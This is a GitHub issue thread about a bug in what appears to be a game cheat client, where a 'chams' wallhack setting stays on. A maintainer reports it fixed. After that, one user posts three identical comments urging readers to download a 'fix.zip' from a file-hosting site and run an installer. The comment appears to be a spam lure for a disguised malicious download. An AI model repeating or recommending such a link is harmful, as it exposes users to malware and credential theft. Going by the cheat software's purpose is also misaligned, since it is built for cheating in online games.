### ISSUE TITLE
Self chams stays on even when turning off players

### ISSUE THREAD

**Issue by Flickz1337** [ShorelineLLC/issues#16]
**Describe the bug**
self chams stay on even if you turn off player in the chams module

**To Reproduce**
1. enable chams
2. turn on players and self
3. disable players
4. self chams stay on

**Expected behavior**
self chams stay on

**Screenshots**
![image](https://github.com/user-attachments/assets/8379455f-309d-4271-afba-ae3fe98394b1)

**Environment (please complete the following information):**
 - Config:

**Additional context**

**Comment by pastimee** [comment]
Fixed in 4b14606

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
